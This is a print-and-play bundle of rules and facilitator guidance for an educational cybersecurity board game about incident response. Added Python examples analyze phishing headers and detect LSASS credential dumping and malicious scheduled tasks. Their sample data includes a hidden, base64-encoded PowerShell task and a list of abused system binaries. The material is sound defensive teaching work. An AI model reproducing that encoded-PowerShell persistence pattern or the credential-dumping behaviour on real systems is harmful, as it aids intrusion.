Complete Game (All 6 Modules) — Print & Play Bundle · v2.2 Playtest Edition
A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0
Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.
docs/HOW_TO_PLAY.md
Version: 2.2 - Playtest Edition · Read time: ~15 minutes · First game: ~45 minutes.
This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.
Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.
The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.
There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.
Every module runs on the same engine: d20 roll + modifiers ≥ 11.
The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:
Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)
The three actions (Blue Team picks ONE per turn):
| Action | Cost | On success (roll+mods ≥ 11) |
|---|---|---|
| Investigate | 5 | 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed! |
| Deploy Defense | 10/15/25 by tier | If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector |
| Emergency Response | 15 | No roll. Contain one already-revealed threat (removes its ongoing penalty) |
The pressure (TO applies at the START of each turn):
- Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not)
- Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)
When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).
TURN 1. TO: "Start of turn: the attacker is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?" Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name." TO: "That's a real methodology and a real tool — +2 and +1. Roll." Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago." (First success on this link — clue only. Budget: 95 - 5 = 90.)
TURN 2. TO: "Active Breach Cost, minus 5. Budget: 85." Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs." TO: "+2, +1. Roll." Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward." Team takes Budget Grant: 85 - 5 + 10 = 90.
TURN 3. TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went." From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)
Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?
Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.
| You want... | Read |
|---|---|
| You're the Threat Orchestrator | The TO Guide — the role, judging justifications, per-module screens |
| Exact rules for a module | docs/rules/ — core + one file per module |
| Solo/standalone setup for any module | docs/standalone-games/ |
| Every card, indexed | cards/CARD_REFERENCE.md |
| To run a playtest and report back | docs/playtesting/ |
| Variable game length & difficulty tiers | core-rules §3a |
- Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR)
- IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15
- IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat
- Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card
- Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+
- Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns
- Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150
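The roll rule and the turn-limit formula in the quick reference above together decide how winnable an Investigate-only game is, which is worth knowing before a TO announces a turn count. The Python below is an added example, not part of the game's materials or repository: it computes the per-roll success chance for each modifier and the exact chance of revealing a whole chain by Investigate alone within (chain cards × 2) + 1 turns, treating each turn as one roll and each card as needing two successes. It ignores Fast-Track rewards and deployed-defense matches, so the chain numbers are a floor, not a forecast.

```python
from math import comb
from typing import Optional

TARGET = 11      # core rule: d20 + modifiers >= 11
DIE_SIDES = 20


def success_probability(modifier: int) -> float:
    """P(d20 + modifier >= TARGET). Each +1 adds exactly one winning face (5 points).
    A modifier of +6 is what Fast-Track's 'succeeds on 5+' is worth."""
    winning_faces = DIE_SIDES - (TARGET - modifier) + 1
    return min(DIE_SIDES, max(0, winning_faces)) / DIE_SIDES


def default_turn_limit(cards: int) -> int:
    """Variable Game Length default: (Attack Chain Cards x 2) + 1."""
    return cards * 2 + 1


def investigate_only_win_probability(cards: int, modifier: int,
                                     turns: Optional[int] = None) -> float:
    """Chance of revealing the whole chain with nothing but Investigate actions.

    Every card needs two successful Investigates, so the team needs at least
    2 * cards successes in `turns` independent rolls: a binomial tail. Budget is
    ignored (an Investigate-only game never runs out of it within the turn limit).
    """
    if turns is None:
        turns = default_turn_limit(cards)
    p = success_probability(modifier)
    needed = 2 * cards
    return sum(comb(turns, k) * p ** k * (1 - p) ** (turns - k)
               for k in range(needed, turns + 1))


def odds_table(cards: int = 3, modifiers=range(0, 7)) -> dict:
    """modifier -> (per-roll success chance, investigate-only chain-reveal chance)."""
    return {m: (success_probability(m), investigate_only_win_probability(cards, m))
            for m in modifiers}


if __name__ == "__main__":
    for cards in (3, 4, 5):
        print(f"{cards}-card chain, {default_turn_limit(cards)} turns")
        for m, (p_roll, p_win) in odds_table(cards).items():
            print(f"  +{m}: roll {p_roll:.0%}, investigate-only reveal {p_win:.1%}")
```

At +0 a 3-card chain is fully revealed by investigation alone only about 6% of the time in 7 turns; at +3 (the justification bonuses from the Turn 1 example) it is about 23%. That gap is the teaching engine doing its job, and it also shows why a full-match Deploy, which reveals a card in one action without a roll, is the play the Turn 3 hint points at.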
docs/TO_GUIDE.md
Version: 2.2 - Playtest Edition · Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.
The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute: facilitator, adversary, and narrator.
If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.
A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.
The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.
+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing.
- ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated)
- ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic)
- ❌ "We investigate the email server thoroughly." (a location is not a method)
+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE.
- ✅ "Check LSASS access events — that's Mimikatz behavior, T1003."
- ❌ "We use our security tools." (names nothing)
Rulings that keep it fair:
- Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0.
- Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game.
- Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics").
- Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change.
- One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").
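The return-path check that earns the +2 above (and that the Turn 1 team describes in HOW_TO_PLAY) is a real analyst procedure. The Python below is an added example, not part of the game's materials or repository: it parses a constructed phishing message and a constructed legitimate one, compares the envelope sender (Return-Path), the Reply-To and any link hosts against the header From domain, reads the gateway's Authentication-Results, and pulls the connecting IP from the earliest Received header to check it against a made-up indicator set. The Meridian Logistics domains, the attacker domain, the IP addresses and the indicator set are all invented for the example.

```python
import email
import ipaddress
import re
from email import policy
from email.utils import parseaddr
from typing import Optional

# Constructed threat-intel indicators standing in for a real feed (example data).
THREAT_INTEL_IPS = {"203.0.113.47"}
THREAT_INTEL_DOMAINS = {"it-reauth-meridian.example"}

# Constructed phishing message: the header From spoofs the company domain, while the
# envelope sender, Reply-To, connecting relay and link all belong to the attacker.
SAMPLE_PHISH = """\
Return-Path: <bounce@it-reauth-meridian.example>
Received: from mx.meridianlogistics.example (mx.meridianlogistics.example [10.0.0.25])
        by mail.meridianlogistics.example with ESMTP id abc123
Received: from relay01.it-reauth-meridian.example (unknown [203.0.113.47])
        by mx.meridianlogistics.example with ESMTP id abc122
Authentication-Results: mx.meridianlogistics.example; spf=fail smtp.mailfrom=it-reauth-meridian.example; dkim=none; dmarc=fail header.from=meridianlogistics.example
From: "Meridian IT Helpdesk" <helpdesk@meridianlogistics.example>
Reply-To: <support@it-reauth-meridian.example>
To: <jdoe@meridianlogistics.example>
Subject: Action required: re-authenticate your account

Please re-authenticate at https://portal.it-reauth-meridian.example/login
"""

# Constructed legitimate message from the same helpdesk, for comparison.
SAMPLE_LEGIT = """\
Return-Path: <helpdesk@meridianlogistics.example>
Received: from mx.meridianlogistics.example (mx.meridianlogistics.example [10.0.0.25])
        by mail.meridianlogistics.example with ESMTP id def456
Authentication-Results: mx.meridianlogistics.example; spf=pass smtp.mailfrom=meridianlogistics.example; dkim=pass; dmarc=pass header.from=meridianlogistics.example
From: "Meridian IT Helpdesk" <helpdesk@meridianlogistics.example>
To: <jdoe@meridianlogistics.example>
Subject: Scheduled maintenance Saturday

Mail will be unavailable 02:00-04:00 UTC. No action is required.
"""

AUTH_FAILURES = {"fail", "softfail", "permerror", "temperror"}


def domain_of(header_value: str) -> str:
    """Lower-cased domain of the first address in an RFC 5322 header value."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def origin_ip(msg) -> Optional[str]:
    """Connecting IP from the earliest Received header. Each relay prepends its own
    header, so the bottom one is the hop closest to the real sender."""
    for hop in reversed(msg.get_all("Received") or []):
        match = re.search(r"\[([0-9a-fA-F.:]+)\]", str(hop))
        if match:
            try:
                return str(ipaddress.ip_address(match.group(1)))
            except ValueError:
                continue
    return None


def analyze(raw_message: str) -> dict:
    """Return the alignment findings an analyst would cite for a +2 justification."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    header_from = domain_of(str(msg.get("From", "")))
    envelope_from = domain_of(str(msg.get("Return-Path", "")))
    reply_to = domain_of(str(msg.get("Reply-To", "")))
    ip = origin_ip(msg)
    findings = []

    # Exact-domain comparison; real DMARC relaxed alignment compares organizational domains.
    if envelope_from and envelope_from != header_from:
        findings.append(f"Return-Path domain {envelope_from} does not align with From domain {header_from}")
    if reply_to and reply_to != header_from:
        findings.append(f"Reply-To redirects replies to {reply_to}")
    auth = str(msg.get("Authentication-Results", "")).lower()
    for mechanism, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", auth):
        if result in AUTH_FAILURES:
            findings.append(f"gateway reported {mechanism}={result}")
    if ip in THREAT_INTEL_IPS:
        findings.append(f"connecting IP {ip} is a known indicator")
    for domain in {envelope_from, reply_to} & THREAT_INTEL_DOMAINS:
        findings.append(f"sender domain {domain} is a known indicator")
    for host in re.findall(r"https?://([A-Za-z0-9.-]+)", msg.get_content()):
        host = host.lower()
        if not (host == header_from or host.endswith("." + header_from)):
            findings.append(f"link host {host} is off the From domain")

    return {
        "header_from": header_from,
        "envelope_from": envelope_from,
        "origin_ip": ip,
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        result = analyze(sample)
        print(f"{label}: {result['verdict']} (origin {result['origin_ip']})")
        for finding in result["findings"]:
            print("  -", finding)
```

Each finding is the kind of specific a TO should hear in a +2 justification: not "we checked the email server" but "Return-Path and From domains disagree and the gateway already recorded dmarc=fail". The check is deliberately strict (exact domain match); a production rule would apply DMARC's organizational-domain alignment and an allowlist for legitimate third-party senders.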
Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.
| Easier (pick 1-2) | Harder (pick 1-2) |
|---|---|
| Richer clues (more specific detail per success) | Vaguer clues (accurate but terse) |
| Suggest an angle through the fiction | Expert-mode justification bar |
| Shorter chain / lower tier next game | Longer chain, expansion cards |
| Beginner budgets (module max) | Minimum budgets |
Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.
| Failure | Symptom | Fix |
|---|---|---|
| The Encyclopedia | You lecture after every roll | One sentence of "why," save the rest for debrief |
| The Softie | Everyone always gets +2 | Re-read §4; require the mechanism |
| The Sphinx | Clues so cryptic nobody moves | Clues must be actionable: each should suggest at least one sensible next investigation |
| The Railroader | You steer them to your solution | Multiple paths are valid; score the outcome, not the route |
| The Accountant | You narrate numbers, not events | Lead with fiction, then state the numbers |
| The Rusher | Debrief skipped because time ran out | Protect the last 10 minutes like it's the win condition — it is |
Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.
docs/rules/core-rules.md
Version: 2.2 - Playtest Edition · Last Updated: October 2025
Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).
Players choose which module(s) to play based on learning objectives: Incident Response, Hardening, Disaster Recovery, Network Building, Forensics, and Audit & Compliance.
Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.
Threat Cards represent attacker actions. Each card includes:
- Title: e.g., "Phishing Campaign"
- Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL
- Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL
- Clue: Descriptive text for the Threat Orchestrator
- Why This Works: Educational explanation (revealed after discovery)
Deck Composition:
- 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
- 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)
Defense Cards represent security controls. Each card includes:
- Title: e.g., "Multi-Factor Authentication"
- Countermeasure Vector: One of the six attack vectors
- Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget)
- Description: What the defense does and when it applies
Deck Composition:
- 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md)
- 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)
Examples:
- BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget)
- ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget)
- ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)
Pentester Tactic Cards represent sophisticated attack techniques used in the Hardening module (and potentially others).
8 Core Tactics (PT-01 to PT-08):
1. PT-01: Social Engineering - Pretexting Attack
2. PT-02: Malware Evasion - Living-off-the-Land Technique
3. PT-03: Credential Dumping - Mimikatz Attack
4. PT-04: Lateral Movement - Network Traversal
5. PT-05: Privilege Escalation - Unpatched Kernel Exploit
6. PT-06: Data Exfiltration - Unmonitored Channel
7. PT-07: Supply Chain Compromise - Trusted Software Update
8. PT-08: Insider Threat - Malicious Administrator
See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.
Simple cards providing scenario context. Examples: - Email Server - Customer Database - Domain Controller - Web Application - Backup System - Developer Workstation
Physical Components:
- One 20-sided die (d20)
- Turn Tracker (paper or board, counts 1-12+)
- Budget Tracker (shows 0-150+)
- Reputation/Security Score Tracker (shows 0-100)
- Uncontained Threats Tracker (shows 0-5)
- Tokens or counters (for tracking upgrades, penalties)
Optional:
- Score sheets (printable or paper)
- Playbook tracking sheet
- Stakeholder communication log (for Disaster Recovery)
When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.
How It Works:
1. Player announces action and parameters
2. Player rolls 1d20 (one 20-sided die)
3. Add the modifiers to the roll and compare the total to the target number (usually 11)
4. Success if: roll + modifiers ≥ target number
Example:
Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)
What is Budget? An abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.
Budget Allocation by Module:
- Network Building: Start at 40-60 (by difficulty; see module rules)
- Hardening: Start at 150 (or carry over from IR)
- Incident Response: Start at 100
- Disaster Recovery: Start at 50 (emergency fund)
- Forensics: Start at 75
- Audit & Compliance: Start at 100 (used only for optional remediation cards)
Budget Spending:
- Investigate action: 5 Budget
- Deploy Defense: 10/15/25 Budget (by tier)
- Emergency Response (IR): 15 Budget (v2.2; was 25)
- Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed
- Harden Upgrade (Hardening): 5 Budget
- Create Playbook (Hardening): 10 Budget
- Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0)
- Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0
Budget = 0: Team loses (cannot take further actions)
Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.
Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)
Turn Sequence:
1. Start of Turn: Penalties applied, trackers announced
2. Planning Phase: Team discusses strategy (2-3 min)
3. Action Phase: Execute chosen action, resolve rolls
4. End of Turn: Advance tracker, draw card, check events
Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.
Default Formula: (Attack Chain Cards × 2) + 1
This gives attackers enough time to progress realistically while keeping games manageable:
| Attack Chain | Formula | Turn Count | Session Duration |
|---|---|---|---|
| 3 cards | (3 × 2) + 1 | 7 turns | 30-40 min play |
| 4 cards | (4 × 2) + 1 | 9 turns | 35-45 min play |
| 5 cards | (5 × 2) + 1 | 11 turns | 40-50 min play |
| 6 cards | (6 × 2) + 1 | 13 turns | 45-55 min play |
How to Use Default Formula: 1. Choose number of threat cards in attack chain (3, 4, 5, or 6) 2. Apply formula: (Cards × 2) + 1 = Turn Count 3. Announce turn count to Blue Team 4. Play game normally with that turn limit
Example Setup:
"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"
Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:
Step 1: Select Attack Complexity Tier
| Tier | Turn Base | Attack Profile | Example |
|---|---|---|---|
| TIER 1 | 5-7 | Simple & obvious | Script kiddie using public tools |
| TIER 2 | 8-10 | Standard sophistication | Organized cybercriminal group |
| TIER 3 | 11-13 | Highly sophisticated | APT with operational security |
| TIER 4 | 14-16 | Expert/Nation-state | State-sponsored group |
Step 2: Add Randomness (Optional)
Roll 1d4 for variation:
- Roll 1: -1 turn (tight timeline)
- Roll 2 or 3: ±0 turns (no change)
- Roll 4: +1 turn (extended dwell time)
Final Turn Count = Tier Base + d4 Result
Example Advanced Setup:
"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."
These rules protect game balance and prevent metagaming:
The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.
Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.
Example Scenarios: - TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic) - TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)
When Chaos Feels Realistic:
- Tight timeline: "The attacker worked faster than expected—they had prior knowledge"
- Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"
Implementation: Lean into the randomness as realistic incident variability.
The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.
Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).
What Players CAN Ask:
- "What are the suspicious network events?" (leads to understanding threats)
- "Can we analyze the malware?" (reveals attacker sophistication through findings)
- "Why did this attack succeed?" (post-game discussion)
What Players CANNOT Ask:
- "Is this a TIER 2 attack?" (deriving tier from turn count)
- "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)
Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.
The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.
When to Use (Rare):
- Scenario setup is unusually complex (multiple attack vectors, coordination across systems)
- Player group is new and needs slightly easier conditions
- Real-world incident being taught had specific timeline constraints
When NOT to Use (Prefer Random):
- "The roll feels unlucky" (accept the chaos)
- "I want this exactly 10 turns" (let dice decide)
- "The attack chain is long so it should take longer" (that's what the TIER system handles)
Implementation:
1. Roll d4 normally
2. Announce rolled result
3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why
4. Document the override for consistency in future scenarios
Example Valid Use:
"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have 5-card attack chain, so I'm adding +1 modifier (explaining the discovery is methodical). Final: 8-10 turns."
Example Invalid Use:
"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)
For Beginners (Use Default Formula):
- [ ] Choose attack chain length (3, 4, 5, or 6 cards)
- [ ] Calculate: (Cards × 2) + 1
- [ ] Announce turn count
- [ ] Play
For Advanced (Use Tier + d4):
- [ ] Select TIER (1, 2, 3, or 4)
- [ ] Announce TIER basis (not the number, just why it's that complexity)
- [ ] Roll d4 for variation (hidden or public, your choice)
- [ ] Calculate final turn count
- [ ] Apply Rule 3 modifier if genuinely needed (rare)
- [ ] Announce final turn count WITHOUT revealing tier
Default Formula: Turn Count = (Attack Cards × 2) + 1
Tier System:
- TIER 1: 5-7 turns (simple)
- TIER 2: 8-10 turns (standard)
- TIER 3: 11-13 turns (advanced)
- TIER 4: 14-16 turns (expert)
- Add d4 roll: -1, 0, 0, or +1
Golden Rules:
1. Accept any roll (embrace chaos)
2. Never reveal tier to players
3. Modifier authority only when truly needed (rare)
All modules use the same modifier system for consistency:
+2 Technical Justification: awarded when a player provides clear, specific reasoning for their action using real security concepts.
Examples:
- "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds"
- "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques"
- "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"
Criteria:
- References specific tools (Splunk, EDR, SIEM, etc.)
- Explains methodology (why this approach works)
- Shows understanding of the threat being addressed
+1 Tool/Technique Reference: awarded when the player references actual security tools or real attack/defense techniques.
Examples:
- "We'll use Wireshark to analyze the network traffic"
- "We're checking for Mimikatz usage in memory"
- "We're reviewing EDR telemetry"
- "We're looking for this specific CVE exploitation pattern"
Criteria:
- References real tools (Wireshark, EDR, Splunk, etc.)
- References real techniques (MITRE ATT&CK, specific CVEs)
- Shows awareness of how things actually work
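Two of the justifications above ("querying our SIEM for scheduled task creation events" and the TO Guide's LSASS-access / T1003 example) describe real detections. The Python below is an added example, not part of the game's materials or repository: it runs those two checks over a handful of constructed records shaped like Sysmon ProcessAccess (Event ID 10) and Windows Security "A scheduled task was created" (Event ID 4698) events. The host name, file paths, task names, the reader allowlist and the base64 fragment are all made up for the demo; the ATT&CK sub-technique IDs are T1003.001 (LSASS Memory) and T1053.005 (Scheduled Task).

```python
import json

# Constructed SIEM records (one JSON object per line). Example data, not real telemetry.
# Backslashes are JSON-escaped inside this raw string.
EVENTS_JSONL = r"""
{"log":"Sysmon","EventID":10,"host":"WS-041","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1000"}
{"log":"Sysmon","EventID":10,"host":"WS-041","SourceImage":"C:\\Users\\jdoe\\Downloads\\update.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"log":"Security","EventID":4698,"host":"WS-041","SubjectUserName":"jdoe","TaskName":"\\Microsoft\\Windows\\UpdateCheck","TaskContent":"<Command>powershell.exe</Command><Arguments>-w hidden -enc SQBFAFgA</Arguments>"}
{"log":"Security","EventID":4698,"host":"WS-041","SubjectUserName":"SYSTEM","TaskName":"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","TaskContent":"<Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments>"}
"""

# Windows process access rights that matter for credential dumping. Mimikatz-style
# reads request PROCESS_VM_READ (commonly masks 0x1010 or 0x1410) or all access.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Processes that legitimately read LSASS memory on many hosts. Hypothetical allowlist
# for this demo; tune per environment.
LSASS_READER_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "wmiprvse.exe"}

# Interpreters and LOLBins that rarely belong in a freshly created task's <Command>.
SUSPICIOUS_TASK_BINARIES = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                            "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")


def check_lsass_access(event: dict):
    """Sysmon Event ID 10: a non-allowlisted process opened lsass.exe with a readable
    handle. Maps to ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory)."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.rsplit("\\", 1)[-1].lower() in LSASS_READER_ALLOWLIST:
        return None
    access = int(event.get("GrantedAccess", "0x0"), 16)
    if access & PROCESS_VM_READ or access == PROCESS_ALL_ACCESS:
        return {"host": event.get("host"), "technique": "T1003.001",
                "detail": f"{source} opened lsass.exe with GrantedAccess 0x{access:x}"}
    return None


def check_scheduled_task(event: dict):
    """Security Event ID 4698: a new task whose action runs an interpreter/LOLBin or
    encoded PowerShell. Maps to ATT&CK T1053.005 (Scheduled Task/Job: Scheduled Task)."""
    if event.get("EventID") != 4698:
        return None
    content = event.get("TaskContent", "").lower()
    runs_interpreter = any(binary in content for binary in SUSPICIOUS_TASK_BINARIES)
    encoded = "-enc" in content or "frombase64string" in content
    if runs_interpreter or encoded:
        return {"host": event.get("host"), "technique": "T1053.005",
                "detail": (f"{event.get('SubjectUserName')} created {event.get('TaskName')} "
                           f"running {content[:60]}")}
    return None


def detect(jsonl: str) -> list:
    """Run every check over every record and return the alerts in log order."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        for check in (check_lsass_access, check_scheduled_task):
            alert = check(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS_JSONL):
        print(f"[{alert['technique']}] {alert['host']}: {alert['detail']}")
```

Note what does not fire: svchost.exe querying lsass.exe with 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION, no read right) and SYSTEM creating the built-in defrag task. That is the difference between "we check LSASS access events" and a rule worth a +2: the access mask and the task's command line are the mechanism.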
Uncontained Threats Penalty. When Applied: Incident Response module only, applied at START of each turn
How It Works:
1. When a threat card is revealed, add 1 to the Uncontained Threats Tracker
2. At START of each turn, deduct 5 Budget per uncontained threat
3. When the next card in the chain is revealed, the previous threat is auto-mitigated (-1 from tracker)
4. When the Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)
Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.
Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.
Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):
Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: START → Deduct 5 Budget (90 remaining)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated; Lateral Movement is now the uncontained one (Uncontained Threats = 1)
Turn 4: START → Deduct 5 Budget (85 remaining)
Turn 4: Emergency Response on Lateral Movement (15 Budget, 70 remaining) → Uncontained Threats = 0
Threat Orchestrator responsibilities:
- Manage game state and track turns/budget
- Describe scenarios and outcomes
- Roll dice when action outcomes are uncertain
